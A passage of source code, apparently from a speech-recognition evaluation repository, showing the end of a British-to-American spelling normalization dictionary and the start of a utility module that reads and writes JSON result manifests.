'homoeopaths': 'homeopaths', 'homoeopathy': 'homeopathy', 'homogenise': 'homogenize', 'homogenised': 'homogenized', 'homogenises': 'homogenizes', 'homogenising': 'homogenizing', 'honour': 'honor', 'honourable': 'honorable', 'honourably': 'honorably', 'honoured': 'honored', 'honouring': 'honoring', 'honours': 'honors', 'hospitalisation': 'hospitalization', 'hospitalise': 'hospitalize', 'hospitalised': 'hospitalized', 'hospitalises': 'hospitalizes', 'hospitalising': 'hospitalizing', 'humanise': 'humanize', 'humanised': 'humanized', 'humanises': 'humanizes', 'humanising': 'humanizing', 'humour': 'humor', 'humoured': 'humored', 'humouring': 'humoring', 'humourless': 'humorless', 'humours': 'humors', 'hybridise': 'hybridize', 'hybridised': 'hybridized', 'hybridises': 'hybridizes', 'hybridising': 'hybridizing', 'hypnotise': 'hypnotize', 'hypnotised': 'hypnotized', 'hypnotises': 'hypnotizes', 'hypnotising': 'hypnotizing', 'hypothesise': 'hypothesize', 'hypothesised': 'hypothesized', 'hypothesises': 'hypothesizes', 
'hypothesising': 'hypothesizing', 'idealisation': 'idealization', 'idealise': 'idealize', 'idealised': 'idealized', 'idealises': 'idealizes', 'idealising': 'idealizing', 'idolise': 'idolize', 'idolised': 'idolized', 'idolises': 'idolizes', 'idolising': 'idolizing', 'immobilisation': 'immobilization', 'immobilise': 'immobilize', 'immobilised': 'immobilized', 'immobiliser': 'immobilizer', 'immobilisers': 'immobilizers', 'immobilises': 'immobilizes', 'immobilising': 'immobilizing', 'immortalise': 'immortalize', 'immortalised': 'immortalized', 'immortalises': 'immortalizes', 'immortalising': 'immortalizing', 'immunisation': 'immunization', 'immunise': 'immunize', 'immunised': 'immunized', 'immunises': 'immunizes', 'immunising': 'immunizing', 'impanelled': 'impaneled', 'impanelling': 'impaneling', 'imperilled': 'imperiled', 'imperilling': 'imperiling', 'individualise': 'individualize', 'individualised': 'individualized', 'individualises': 'individualizes', 'individualising': 'individualizing', 'industrialise': 'industrialize', 'industrialised': 'industrialized', 'industrialises': 'industrializes', 'industrialising': 'industrializing', 'inflexion': 'inflection', 'inflexions': 'inflections', 'initialise': 'initialize', 'initialised': 'initialized', 'initialises': 'initializes', 'initialising': 'initializing', 'initialled': 'initialed', 'initialling': 'initialing', 'instal': 'install', 'instalment': 'installment', 'instalments': 'installments', 'instals': 'installs', 'instil': 'instill', 'instils': 'instills', 'institutionalisation': 'institutionalization', 'institutionalise': 'institutionalize', 'institutionalised': 'institutionalized', 'institutionalises': 'institutionalizes', 'institutionalising': 'institutionalizing', 'intellectualise': 'intellectualize', 'intellectualised': 'intellectualized', 'intellectualises': 'intellectualizes', 'intellectualising': 'intellectualizing', 'internalisation': 'internalization', 'internalise': 'internalize', 'internalised': 'internalized', 'internalises': 'internalizes', 'internalising': 'internalizing', 'internationalisation': 'internationalization', 'internationalise': 'internationalize', 'internationalised': 'internationalized', 'internationalises': 'internationalizes', 'internationalising': 'internationalizing', 'ionisation': 'ionization', 'ionise': 'ionize', 'ionised': 'ionized', 'ioniser': 'ionizer', 'ionisers': 'ionizers', 'ionises': 'ionizes', 'ionising': 'ionizing', 'italicise': 'italicize', 'italicised': 'italicized', 'italicises': 'italicizes', 'italicising': 'italicizing', 'itemise': 'itemize', 'itemised': 'itemized', 'itemises': 'itemizes', 'itemising': 'itemizing', 'jeopardise': 'jeopardize', 'jeopardised': 'jeopardized', 'jeopardises': 'jeopardizes', 'jeopardising': 'jeopardizing', 'jewelled': 'jeweled', 'jeweller': 'jeweler', 'jewellers': 'jewelers', 'jewellery': 'jewelry', 'judgement': 'judgment', 'kilogramme': 'kilogram', 'kilogrammes': 'kilograms', 'kilometre': 'kilometer', 'kilometres': 'kilometers', 'labelled': 'labeled', 'labelling': 'labeling', 'labour': 'labor', 'laboured': 'labored', 'labourer': 'laborer', 'labourers': 'laborers', 'labouring': 'laboring', 'labours': 'labors', 'lacklustre': 'lackluster', 'legalisation': 'legalization', 'legalise': 'legalize', 'legalised': 'legalized', 'legalises': 'legalizes', 'legalising': 'legalizing', 'legitimise': 'legitimize', 'legitimised': 'legitimized', 'legitimises': 'legitimizes', 'legitimising': 'legitimizing', 'leukaemia': 'leukemia', 'levelled': 'leveled', 'leveller': 'leveler', 
'levellers': 'levelers', 'levelling': 'leveling', 'libelled': 'libeled', 'libelling': 'libeling', 'libellous': 'libelous', 'liberalisation': 'liberalization', 'liberalise': 'liberalize', 'liberalised': 'liberalized', 'liberalises': 'liberalizes', 'liberalising': 'liberalizing', 'licence': 'license', 'licenced': 'licensed', 'licences': 'licenses', 'licencing': 'licensing', 'likeable': 'likable', 'lionisation': 'lionization', 'lionise': 'lionize', 'lionised': 'lionized', 'lionises': 'lionizes', 'lionising': 'lionizing', 'liquidise': 'liquidize', 'liquidised': 'liquidized', 'liquidiser': 'liquidizer', 'liquidisers': 'liquidizers', 'liquidises': 'liquidizes', 'liquidising': 'liquidizing', 'litre': 'liter', 'litres': 'liters', 'localise': 'localize', 'localised': 'localized', 'localises': 'localizes', 'localising': 'localizing', 'louvre': 'louver', 'louvred': 'louvered', 'louvres': 'louvers', 'lustre': 'luster', 'magnetise': 'magnetize', 'magnetised': 'magnetized', 'magnetises': 'magnetizes', 'magnetising': 'magnetizing', 'manoeuvrability': 'maneuverability', 'manoeuvrable': 'maneuverable', 'manoeuvre': 'maneuver', 'manoeuvred': 'maneuvered', 'manoeuvres': 'maneuvers', 'manoeuvring': 'maneuvering', 'manoeuvrings': 'maneuverings', 'marginalisation': 'marginalization', 'marginalise': 'marginalize', 'marginalised': 'marginalized', 'marginalises': 'marginalizes', 'marginalising': 'marginalizing', 'marshalled': 'marshaled', 'marshalling': 'marshaling', 'marvelled': 'marveled', 'marvelling': 'marveling', 'marvellous': 'marvelous', 'marvellously': 'marvelously', 'materialisation': 'materialization', 'materialise': 'materialize', 'materialised': 'materialized', 'materialises': 'materializes', 'materialising': 'materializing', 'maximisation': 'maximization', 'maximise': 'maximize', 'maximised': 'maximized', 'maximises': 'maximizes', 'maximising': 'maximizing', 'meagre': 'meager', 'mechanisation': 'mechanization', 'mechanise': 'mechanize', 'mechanised': 'mechanized', 'mechanises': 'mechanizes', 'mechanising': 'mechanizing', 'mediaeval': 'medieval', 'memorialise': 'memorialize', 'memorialised': 'memorialized', 'memorialises': 'memorializes', 'memorialising': 'memorializing', 'memorise': 'memorize', 'memorised': 'memorized', 'memorises': 'memorizes', 'memorising': 'memorizing', 'mesmerise': 'mesmerize', 'mesmerised': 'mesmerized', 'mesmerises': 'mesmerizes', 'mesmerising': 'mesmerizing', 'metabolise': 'metabolize', 'metabolised': 'metabolized', 'metabolises': 'metabolizes', 'metabolising': 'metabolizing', 'metre': 'meter', 'metres': 'meters', 'mhm': 'hmm', 'micrometre': 'micrometer', 'micrometres': 'micrometers', 'militarise': 'militarize', 'militarised': 'militarized', 'militarises': 'militarizes', 'militarising': 'militarizing', 'milligramme': 'milligram', 'milligrammes': 'milligrams', 'millilitre': 'milliliter', 'millilitres': 'milliliters', 'millimetre': 'millimeter', 'millimetres': 'millimeters', 'miniaturisation': 'miniaturization', 'miniaturise': 'miniaturize', 'miniaturised': 'miniaturized', 'miniaturises': 'miniaturizes', 'miniaturising': 'miniaturizing', 'minibusses': 'minibuses', 'minimise': 'minimize', 'minimised': 'minimized', 'minimises': 'minimizes', 'minimising': 'minimizing', 'misbehaviour': 'misbehavior', 'misdemeanour': 'misdemeanor', 'misdemeanours': 'misdemeanors', 'misspelt': 'misspelled', 'mitre': 'miter', 'mitres': 'miters', 'mm': 'hmm', 'mmm': 'hmm', 'mobilisation': 'mobilization', 'mobilise': 'mobilize', 'mobilised': 'mobilized', 'mobilises': 'mobilizes', 'mobilising': 
'mobilizing', 'modelled': 'modeled', 'modeller': 'modeler', 'modellers': 'modelers', 'modelling': 'modeling', 'modernise': 'modernize', 'modernised': 'modernized', 'modernises': 'modernizes', 'modernising': 'modernizing', 'moisturise': 'moisturize', 'moisturised': 'moisturized', 'moisturiser': 'moisturizer', 'moisturisers': 'moisturizers', 'moisturises': 'moisturizes', 'moisturising': 'moisturizing', 'monologue': 'monolog', 'monologues': 'monologs', 'monopolisation': 'monopolization', 'monopolise': 'monopolize', 'monopolised': 'monopolized', 'monopolises': 'monopolizes', 'monopolising': 'monopolizing', 'moralise': 'moralize', 'moralised': 'moralized', 'moralises': 'moralizes', 'moralising': 'moralizing', 'motorised': 'motorized', 'mould': 'mold', 'moulded': 'molded', 'moulder': 'molder', 'mouldered': 'moldered', 'mouldering': 'moldering', 'moulders': 'molders', 'mouldier': 'moldier', 'mouldiest': 'moldiest', 'moulding': 'molding', 'mouldings': 'moldings', 'moulds': 'molds', 'mouldy': 'moldy', 'moult': 'molt', 'moulted': 'molted', 'moulting': 'molting', 'moults': 'molts', 'moustache': 'mustache', 'moustached': 'mustached', 'moustaches': 'mustaches', 'moustachioed': 'mustachioed', 'multicoloured': 'multicolored', 'nationalisation': 'nationalization', 'nationalisations': 'nationalizations', 'nationalise': 'nationalize', 'nationalised': 'nationalized', 'nationalises': 'nationalizes', 'nationalising': 'nationalizing', 'naturalisation': 'naturalization', 'naturalise': 'naturalize', 'naturalised': 'naturalized', 'naturalises': 'naturalizes', 'naturalising': 'naturalizing', 'neighbour': 'neighbor', 'neighbourhood': 'neighborhood', 'neighbourhoods': 'neighborhoods', 'neighbouring': 'neighboring', 'neighbourliness': 'neighborliness', 'neighbourly': 'neighborly', 'neighbours': 'neighbors', 'neutralisation': 'neutralization', 'neutralise': 'neutralize', 'neutralised': 'neutralized', 'neutralises': 'neutralizes', 'neutralising': 'neutralizing', 'normalisation': 'normalization', 'normalise': 'normalize', 'normalised': 'normalized', 'normalises': 'normalizes', 'normalising': 'normalizing', 'odour': 'odor', 'odourless': 'odorless', 'odours': 'odors', 'oesophagus': 'esophagus', 'oesophaguses': 'esophaguses', 'oestrogen': 'estrogen', 'offence': 'offense', 'offences': 'offenses', 'omelette': 'omelet', 'omelettes': 'omelets', 'optimise': 'optimize', 'optimised': 'optimized', 'optimises': 'optimizes', 'optimising': 'optimizing', 'organisation': 'organization', 'organisational': 'organizational', 'organisations': 'organizations', 'organise': 'organize', 'organised': 'organized', 'organiser': 'organizer', 'organisers': 'organizers', 'organises': 'organizes', 'organising': 'organizing', 'orthopaedic': 'orthopedic', 'orthopaedics': 'orthopedics', 'ostracise': 'ostracize', 'ostracised': 'ostracized', 'ostracises': 'ostracizes', 'ostracising': 'ostracizing', 'outmanoeuvre': 'outmaneuver', 'outmanoeuvred': 'outmaneuvered', 'outmanoeuvres': 'outmaneuvers', 'outmanoeuvring': 'outmaneuvering', 'overemphasise': 'overemphasize', 'overemphasised': 'overemphasized', 'overemphasises': 'overemphasizes', 'overemphasising': 'overemphasizing', 'oxidisation': 'oxidization', 'oxidise': 'oxidize', 'oxidised': 'oxidized', 'oxidises': 'oxidizes', 'oxidising': 'oxidizing', 'paederast': 'pederast', 'paederasts': 'pederasts', 'paediatric': 'pediatric', 'paediatrician': 'pediatrician', 'paediatricians': 'pediatricians', 'paediatrics': 'pediatrics', 'paedophile': 'pedophile', 'paedophiles': 'pedophiles', 'paedophilia': 'pedophilia', 
'palaeolithic': 'paleolithic', 'palaeontologist': 'paleontologist', 'palaeontologists': 'paleontologists', 'palaeontology': 'paleontology', 'panelled': 'paneled', 'panelling': 'paneling', 'panellist': 'panelist', 'panellists': 'panelists', 'paralyse': 'paralyze', 'paralysed': 'paralyzed', 'paralyses': 'paralyzes', 'paralysing': 'paralyzing', 'parcelled': 'parceled', 'parcelling': 'parceling', 'parlour': 'parlor', 'parlours': 'parlors', 'particularise': 'particularize', 'particularised': 'particularized', 'particularises': 'particularizes', 'particularising': 'particularizing', 'passivisation': 'passivization', 'passivise': 'passivize', 'passivised': 'passivized', 'passivises': 'passivizes', 'passivising': 'passivizing', 'pasteurisation': 'pasteurization', 'pasteurise': 'pasteurize', 'pasteurised': 'pasteurized', 'pasteurises': 'pasteurizes', 'pasteurising': 'pasteurizing', 'patronise': 'patronize', 'patronised': 'patronized', 'patronises': 'patronizes', 'patronising': 'patronizing', 'patronisingly': 'patronizingly', 'pedalled': 'pedaled', 'pedalling': 'pedaling', 'pedestrianisation': 'pedestrianization', 'pedestrianise': 'pedestrianize', 'pedestrianised': 'pedestrianized', 'pedestrianises': 'pedestrianizes', 'pedestrianising': 'pedestrianizing', 'penalise': 'penalize', 'penalised': 'penalized', 'penalises': 'penalizes', 'penalising': 'penalizing', 'pencilled': 'penciled', 'pencilling': 'penciling', 'personalise': 'personalize', 'personalised': 'personalized', 'personalises': 'personalizes', 'personalising': 'personalizing', 'pharmacopoeia': 'pharmacopeia', 'pharmacopoeias': 'pharmacopeias', 'philosophise': 'philosophize', 'philosophised': 'philosophized', 'philosophises': 'philosophizes', 'philosophising': 'philosophizing', 'philtre': 'filter', 'philtres': 'filters', 'phoney': 'phony', 'plagiarise': 'plagiarize', 'plagiarised': 'plagiarized', 'plagiarises': 'plagiarizes', 'plagiarising': 'plagiarizing', 'plough': 'plow', 'ploughed': 'plowed', 'ploughing': 'plowing', 'ploughman': 'plowman', 'ploughmen': 'plowmen', 'ploughs': 'plows', 'ploughshare': 'plowshare', 'ploughshares': 'plowshares', 'polarisation': 'polarization', 'polarise': 'polarize', 'polarised': 'polarized', 'polarises': 'polarizes', 'polarising': 'polarizing', 'politicisation': 'politicization', 'politicise': 'politicize', 'politicised': 'politicized', 'politicises': 'politicizes', 'politicising': 'politicizing', 'popularisation': 'popularization', 'popularise': 'popularize', 'popularised': 'popularized', 'popularises': 'popularizes', 'popularising': 'popularizing', 'pouffe': 'pouf', 'pouffes': 'poufs', 'practise': 'practice', 'practised': 'practiced', 'practises': 'practices', 'practising': 'practicing', 'praesidium': 'presidium', 'praesidiums': 'presidiums', 'pressurisation': 'pressurization', 'pressurise': 'pressurize', 'pressurised': 'pressurized', 'pressurises': 'pressurizes', 'pressurising': 'pressurizing', 'pretence': 'pretense', 'pretences': 'pretenses', 'primaeval': 'primeval', 'prioritisation': 'prioritization', 'prioritise': 'prioritize', 'prioritised': 'prioritized', 'prioritises': 'prioritizes', 'prioritising': 'prioritizing', 'privatisation': 'privatization', 'privatisations': 'privatizations', 'privatise': 'privatize', 'privatised': 'privatized', 'privatises': 'privatizes', 'privatising': 'privatizing', 'professionalisation': 'professionalization', 'professionalise': 'professionalize', 'professionalised': 'professionalized', 'professionalises': 'professionalizes', 'professionalising': 'professionalizing', 
'programme': 'program', 'programmes': 'programs', 'prologue': 'prolog', 'prologues': 'prologs', 'propagandise': 'propagandize', 'propagandised': 'propagandized', 'propagandises': 'propagandizes', 'propagandising': 'propagandizing', 'proselytise': 'proselytize', 'proselytised': 'proselytized', 'proselytiser': 'proselytizer', 'proselytisers': 'proselytizers', 'proselytises': 'proselytizes', 'proselytising': 'proselytizing', 'psychoanalyse': 'psychoanalyze', 'psychoanalysed': 'psychoanalyzed', 'psychoanalyses': 'psychoanalyzes', 'psychoanalysing': 'psychoanalyzing', 'publicise': 'publicize', 'publicised': 'publicized', 'publicises': 'publicizes', 'publicising': 'publicizing', 'pulverisation': 'pulverization', 'pulverise': 'pulverize', 'pulverised': 'pulverized', 'pulverises': 'pulverizes', 'pulverising': 'pulverizing', 'pummelled': 'pummel', 'pummelling': 'pummeled', 'pyjama': 'pajama', 'pyjamas': 'pajamas', 'pzazz': 'pizzazz', 'quarrelled': 'quarreled', 'quarrelling': 'quarreling', 'radicalise': 'radicalize', 'radicalised': 'radicalized', 'radicalises': 'radicalizes', 'radicalising': 'radicalizing', 'rancour': 'rancor', 'randomise': 'randomize', 'randomised': 'randomized', 'randomises': 'randomizes', 'randomising': 'randomizing', 'rationalisation': 'rationalization', 'rationalisations': 'rationalizations', 'rationalise': 'rationalize', 'rationalised': 'rationalized', 'rationalises': 'rationalizes', 'rationalising': 'rationalizing', 'ravelled': 'raveled', 'ravelling': 'raveling', 'realisable': 'realizable', 'realisation': 'realization', 'realisations': 'realizations', 'realise': 'realize', 'realised': 'realized', 'realises': 'realizes', 'realising': 'realizing', 'recognisable': 'recognizable', 'recognisably': 'recognizably', 'recognisance': 'recognizance', 'recognise': 'recognize', 'recognised': 'recognized', 'recognises': 'recognizes', 'recognising': 'recognizing', 'reconnoitre': 'reconnoiter', 'reconnoitred': 'reconnoitered', 'reconnoitres': 'reconnoiters', 'reconnoitring': 'reconnoitering', 'refuelled': 'refueled', 'refuelling': 'refueling', 'regularisation': 'regularization', 'regularise': 'regularize', 'regularised': 'regularized', 'regularises': 'regularizes', 'regularising': 'regularizing', 'remodelled': 'remodeled', 'remodelling': 'remodeling', 'remould': 'remold', 'remoulded': 'remolded', 'remoulding': 'remolding', 'remoulds': 'remolds', 'reorganisation': 'reorganization', 'reorganisations': 'reorganizations', 'reorganise': 'reorganize', 'reorganised': 'reorganized', 'reorganises': 'reorganizes', 'reorganising': 'reorganizing', 'revelled': 'reveled', 'reveller': 'reveler', 'revellers': 'revelers', 'revelling': 'reveling', 'revitalise': 'revitalize', 'revitalised': 'revitalized', 'revitalises': 'revitalizes', 'revitalising': 'revitalizing', 'revolutionise': 'revolutionize', 'revolutionised': 'revolutionized', 'revolutionises': 'revolutionizes', 'revolutionising': 'revolutionizing', 'rhapsodise': 'rhapsodize', 'rhapsodised': 'rhapsodized', 'rhapsodises': 'rhapsodizes', 'rhapsodising': 'rhapsodizing', 'rigour': 'rigor', 'rigours': 'rigors', 'ritualised': 'ritualized', 'rivalled': 'rivaled', 'rivalling': 'rivaling', 'romanticise': 'romanticize', 'romanticised': 'romanticized', 'romanticises': 'romanticizes', 'romanticising': 'romanticizing', 'rumour': 'rumor', 'rumoured': 'rumored', 'rumours': 'rumors', 'sabre': 'saber', 'sabres': 'sabers', 'saltpetre': 'saltpeter', 'sanitise': 'sanitize', 'sanitised': 'sanitized', 'sanitises': 'sanitizes', 'sanitising': 'sanitizing', 'satirise': 
'satirize', 'satirised': 'satirized', 'satirises': 'satirizes', 'satirising': 'satirizing', 'saviour': 'savior', 'saviours': 'saviors', 'savour': 'savor', 'savoured': 'savored', 'savouries': 'savories', 'savouring': 'savoring', 'savours': 'savors', 'savoury': 'savory', 'scandalise': 'scandalize', 'scandalised': 'scandalized', 'scandalises': 'scandalizes', 'scandalising': 'scandalizing', 'sceptic': 'skeptic', 'sceptical': 'skeptical', 'sceptically': 'skeptically', 'scepticism': 'skepticism', 'sceptics': 'skeptics', 'sceptre': 'scepter', 'sceptres': 'scepters', 'scrutinise': 'scrutinize', 'scrutinised': 'scrutinized', 'scrutinises': 'scrutinizes', 'scrutinising': 'scrutinizing', 'secularisation': 'secularization', 'secularise': 'secularize', 'secularised': 'secularized', 'secularises': 'secularizes', 'secularising': 'secularizing', 'sensationalise': 'sensationalize', 'sensationalised': 'sensationalized', 'sensationalises': 'sensationalizes', 'sensationalising': 'sensationalizing', 'sensitise': 'sensitize', 'sensitised': 'sensitized', 'sensitises': 'sensitizes', 'sensitising': 'sensitizing', 'sentimentalise': 'sentimentalize', 'sentimentalised': 'sentimentalized', 'sentimentalises': 'sentimentalizes', 'sentimentalising': 'sentimentalizing', 'sepulchre': 'sepulcher', 'sepulchres': 'sepulchers', 'serialisation': 'serialization', 'serialisations': 'serializations', 'serialise': 'serialize', 'serialised': 'serialized', 'serialises': 'serializes', 'serialising': 'serializing', 'sermonise': 'sermonize', 'sermonised': 'sermonized', 'sermonises': 'sermonizes', 'sermonising': 'sermonizing', 'sheikh': 'sheik', 'shovelled': 'shoveled', 'shovelling': 'shoveling', 'shrivelled': 'shriveled', 'shrivelling': 'shriveling', 'signalise': 'signalize', 'signalised': 'signalized', 'signalises': 'signalizes', 'signalising': 'signalizing', 'signalled': 'signaled', 'signalling': 'signaling', 'smoulder': 'smolder', 'smouldered': 'smoldered', 'smouldering': 'smoldering', 'smoulders': 'smolders', 'snivelled': 'sniveled', 'snivelling': 'sniveling', 'snorkelled': 'snorkeled', 'snorkelling': 'snorkeling', 'snowplough': 'snowplow', 'snowploughs': 'snowplow', 'socialisation': 'socialization', 'socialise': 'socialize', 'socialised': 'socialized', 'socialises': 'socializes', 'socialising': 'socializing', 'sodomise': 'sodomize', 'sodomised': 'sodomized', 'sodomises': 'sodomizes', 'sodomising': 'sodomizing', 'solemnise': 'solemnize', 'solemnised': 'solemnized', 'solemnises': 'solemnizes', 'solemnising': 'solemnizing', 'sombre': 'somber', 'specialisation': 'specialization', 'specialisations': 'specializations', 'specialise': 'specialize', 'specialised': 'specialized', 'specialises': 'specializes', 'specialising': 'specializing', 'spectre': 'specter', 'spectres': 'specters', 'spiralled': 'spiraled', 'spiralling': 'spiraling', 'splendour': 'splendor', 'splendours': 'splendors', 'squirrelled': 'squirreled', 'squirrelling': 'squirreling', 'stabilisation': 'stabilization', 'stabilise': 'stabilize', 'stabilised': 'stabilized', 'stabiliser': 'stabilizer', 'stabilisers': 'stabilizers', 'stabilises': 'stabilizes', 'stabilising': 'stabilizing', 'standardisation': 'standardization', 'standardise': 'standardize', 'standardised': 'standardized', 'standardises': 'standardizes', 'standardising': 'standardizing', 'stencilled': 'stenciled', 'stencilling': 'stenciling', 'sterilisation': 'sterilization', 'sterilisations': 'sterilizations', 'sterilise': 'sterilize', 'sterilised': 'sterilized', 'steriliser': 'sterilizer', 'sterilisers': 
'sterilizers', 'sterilises': 'sterilizes', 'sterilising': 'sterilizing', 'stigmatisation': 'stigmatization', 'stigmatise': 'stigmatize', 'stigmatised': 'stigmatized', 'stigmatises': 'stigmatizes', 'stigmatising': 'stigmatizing', 'storey': 'story', 'storeys': 'stories', 'subsidisation': 'subsidization', 'subsidise': 'subsidize', 'subsidised': 'subsidized', 'subsidiser': 'subsidizer', 'subsidisers': 'subsidizers', 'subsidises': 'subsidizes', 'subsidising': 'subsidizing', 'succour': 'succor', 'succoured': 'succored', 'succouring': 'succoring', 'succours': 'succors', 'sulphate': 'sulfate', 'sulphates': 'sulfates', 'sulphide': 'sulfide', 'sulphides': 'sulfides', 'sulphur': 'sulfur', 'sulphurous': 'sulfurous', 'summarise': 'summarize', 'summarised': 'summarized', 'summarises': 'summarizes', 'summarising': 'summarizing', 'swivelled': 'swiveled', 'swivelling': 'swiveling', 'symbolise': 'symbolize', 'symbolised': 'symbolized', 'symbolises': 'symbolizes', 'symbolising': 'symbolizing', 'sympathise': 'sympathize', 'sympathised': 'sympathized', 'sympathiser': 'sympathizer', 'sympathisers': 'sympathizers', 'sympathises': 'sympathizes', 'sympathising': 'sympathizing', 'synchronisation': 'synchronization', 'synchronise': 'synchronize', 'synchronised': 'synchronized', 'synchronises': 'synchronizes', 'synchronising': 'synchronizing', 'synthesise': 'synthesize', 'synthesised': 'synthesized', 'synthesiser': 'synthesizer', 'synthesisers': 'synthesizers', 'synthesises': 'synthesizes', 'synthesising': 'synthesizing', 'syphon': 'siphon', 'syphoned': 'siphoned', 'syphoning': 'siphoning', 'syphons': 'siphons', 'systematisation': 'systematization', 'systematise': 'systematize', 'systematised': 'systematized', 'systematises': 'systematizes', 'systematising': 'systematizing', 'tantalise': 'tantalize', 'tantalised': 'tantalized', 'tantalises': 'tantalizes', 'tantalising': 'tantalizing', 'tantalisingly': 'tantalizingly', 'tasselled': 'tasseled', 'technicolour': 'technicolor', 'temporise': 'temporize', 'temporised': 'temporized', 'temporises': 'temporizes', 'temporising': 'temporizing', 'tenderise': 'tenderize', 'tenderised': 'tenderized', 'tenderises': 'tenderizes', 'tenderising': 'tenderizing', 'terrorise': 'terrorize', 'terrorised': 'terrorized', 'terrorises': 'terrorizes', 'terrorising': 'terrorizing', 'theatre': 'theater', 'theatregoer': 'theatergoer', 'theatregoers': 'theatergoers', 'theatres': 'theaters', 'theorise': 'theorize', 'theorised': 'theorized', 'theorises': 'theorizes', 'theorising': 'theorizing', 'tonne': 'ton', 'tonnes': 'tons', 'towelled': 'toweled', 'towelling': 'toweling', 'toxaemia': 'toxemia', 'tranquillise': 'tranquilize', 'tranquillised': 'tranquilized', 'tranquilliser': 'tranquilizer', 'tranquillisers': 'tranquilizers', 'tranquillises': 'tranquilizes', 'tranquillising': 'tranquilizing', 'tranquillity': 'tranquility', 'tranquillize': 'tranquilize', 'tranquillized': 'tranquilized', 'tranquillizer': 'tranquilizer', 'tranquillizers': 'tranquilizers', 'tranquillizes': 'tranquilizes', 'tranquillizing': 'tranquilizing', 'tranquilly': 'tranquility', 'transistorised': 'transistorized', 'traumatise': 'traumatize', 'traumatised': 'traumatized', 'traumatises': 'traumatizes', 'traumatising': 'traumatizing', 'travelled': 'traveled', 'traveller': 'traveler', 'travellers': 'travelers', 'travelling': 'traveling', 'travelog': 'travelogue', 'travelogs': 'travelogues', 'trialled': 'trialed', 'trialling': 'trialing', 'tricolour': 'tricolor', 'tricolours': 'tricolors', 'trivialise': 'trivialize', 'trivialised': 
'trivialized', 'trivialises': 'trivializes', 'trivialising': 'trivializing', 'tumour': 'tumor', 'tumours': 'tumors', 'tunnelled': 'tunneled', 'tunnelling': 'tunneling', 'tyrannise': 'tyrannize', 'tyrannised': 'tyrannized', 'tyrannises': 'tyrannizes', 'tyrannising': 'tyrannizing', 'tyre': 'tire', 'tyres': 'tires', 'unauthorised': 'unauthorized', 'uncivilised': 'uncivilized', 'underutilised': 'underutilized', 'unequalled': 'unequaled', 'unfavourable': 'unfavorable', 'unfavourably': 'unfavorably', 'unionisation': 'unionization', 'unionise': 'unionize', 'unionised': 'unionized', 'unionises': 'unionizes', 'unionising': 'unionizing', 'unorganised': 'unorganized', 'unravelled': 'unraveled', 'unravelling': 'unraveling', 'unrecognisable': 'unrecognizable', 'unrecognised': 'unrecognized', 'unrivalled': 'unrivaled', 'unsavoury': 'unsavory', 'untrammelled': 'untrammeled', 'urbanisation': 'urbanization', 'urbanise': 'urbanize', 'urbanised': 'urbanized', 'urbanises': 'urbanizes', 'urbanising': 'urbanizing', 'utilisable': 'utilizable', 'utilisation': 'utilization', 'utilise': 'utilize', 'utilised': 'utilized', 'utilises': 'utilizes', 'utilising': 'utilizing', 'valour': 'valor', 'vandalise': 'vandalize', 'vandalised': 'vandalized', 'vandalises': 'vandalizes', 'vandalising': 'vandalizing', 'vaporisation': 'vaporization', 'vaporise': 'vaporize', 'vaporised': 'vaporized', 'vaporises': 'vaporizes', 'vaporising': 'vaporizing', 'vapour': 'vapor', 'vapours': 'vapors', 'verbalise': 'verbalize', 'verbalised': 'verbalized', 'verbalises': 'verbalizes', 'verbalising': 'verbalizing', 'victimisation': 'victimization', 'victimise': 'victimize', 'victimised': 'victimized', 'victimises': 'victimizes', 'victimising': 'victimizing', 'videodisc': 'videodisk', 'videodiscs': 'videodisks', 'vigour': 'vigor', 'visualisation': 'visualization', 'visualisations': 'visualizations', 'visualise': 'visualize', 'visualised': 'visualized', 'visualises': 'visualizes', 'visualising': 'visualizing', 'vocalisation': 'vocalization', 'vocalisations': 'vocalizations', 'vocalise': 'vocalize', 'vocalised': 'vocalized', 'vocalises': 'vocalizes', 'vocalising': 'vocalizing', 'vulcanised': 'vulcanized', 'vulgarisation': 'vulgarization', 'vulgarise': 'vulgarize', 'vulgarised': 'vulgarized', 'vulgarises': 'vulgarizes', 'vulgarising': 'vulgarizing', 'waggon': 'wagon', 'waggons': 'wagons', 'watercolour': 'watercolor', 'watercolours': 'watercolors', 'weaselled': 'weaseled', 'weaselling': 'weaseling', 'westernisation': 'westernization', 'westernise': 'westernize', 'westernised': 'westernized', 'westernises': 'westernizes', 'westernising': 'westernizing', 'womanise': 'womanize', 'womanised': 'womanized', 'womaniser': 'womanizer', 'womanisers': 'womanizers', 'womanises': 'womanizes', 'womanising': 'womanizing', 'woollen': 'woolen', 'woollens': 'woolens', 'woollies': 'woolies', 'woolly': 'wooly', 'worshipped': 'worshiped', 'worshipper': 'worshiper', 'worshipping': 'worshiping', 'yodelled': 'yodeled', 'yodelling': 'yodeling', 'yoghourt': 'yogurt', 'yoghourts': 'yogurts', 'yoghurt': 'yogurt', 'yoghurts': 'yogurts'}
218
+
219
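A sketch of how a spelling map like the one above is typically applied, word by word, as one step of the English text normalizer (the helper name below is illustrative, not part of the repository):

def apply_spelling_map(text: str, mapping: dict) -> str:
    # Replace each whitespace-separated word that has an American-English entry.
    return ' '.join(mapping.get(word, word) for word in text.split())

print(apply_spelling_map('the colour of my favourite jewellery', english_spelling_normalizer))
# -> 'the color of my favorite jewelry'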
+ # File: open_asr_leaderboard-main/normalizer/eval_utils.py
220
+ import os
221
+ import glob
222
+ import json
223
+ import evaluate
224
+ from collections import defaultdict
225
+
226
+ def read_manifest(manifest_path: str):
227
+ data = []
228
+ with open(manifest_path, 'r', encoding='utf-8') as f:
229
+ for line in f:
230
+ if len(line) > 0:
231
+ datum = json.loads(line)
232
+ data.append(datum)
233
+ return data
234
+
235
+ def write_manifest(references: list, transcriptions: list, model_id: str, dataset_path: str, dataset_name: str, split: str, audio_length: list=None, transcription_time: list=None):
236
+ model_id = model_id.replace('/', '-')
237
+ dataset_path = dataset_path.replace('/', '-')
238
+ dataset_name = dataset_name.replace('/', '-')
239
+ if len(references) != len(transcriptions):
240
+ raise ValueError(f'The number of samples in `references` ({len(references)}) must match `transcriptions` ({len(transcriptions)}).')
241
+ if audio_length is not None and len(audio_length) != len(references):
242
+ raise ValueError(f'The number of samples in `audio_length` ({len(audio_length)}) must match `references` ({len(references)}).')
243
+ if transcription_time is not None and len(transcription_time) != len(references):
244
+ raise ValueError(f'The number of samples in `transcription_time` ({len(transcription_time)}) must match `references` ({len(references)}).')
245
+ audio_length = audio_length if audio_length is not None else len(references) * [None]
246
+ transcription_time = transcription_time if transcription_time is not None else len(references) * [None]
247
+ basedir = './results/'
248
+ if not os.path.exists(basedir):
249
+ os.makedirs(basedir)
250
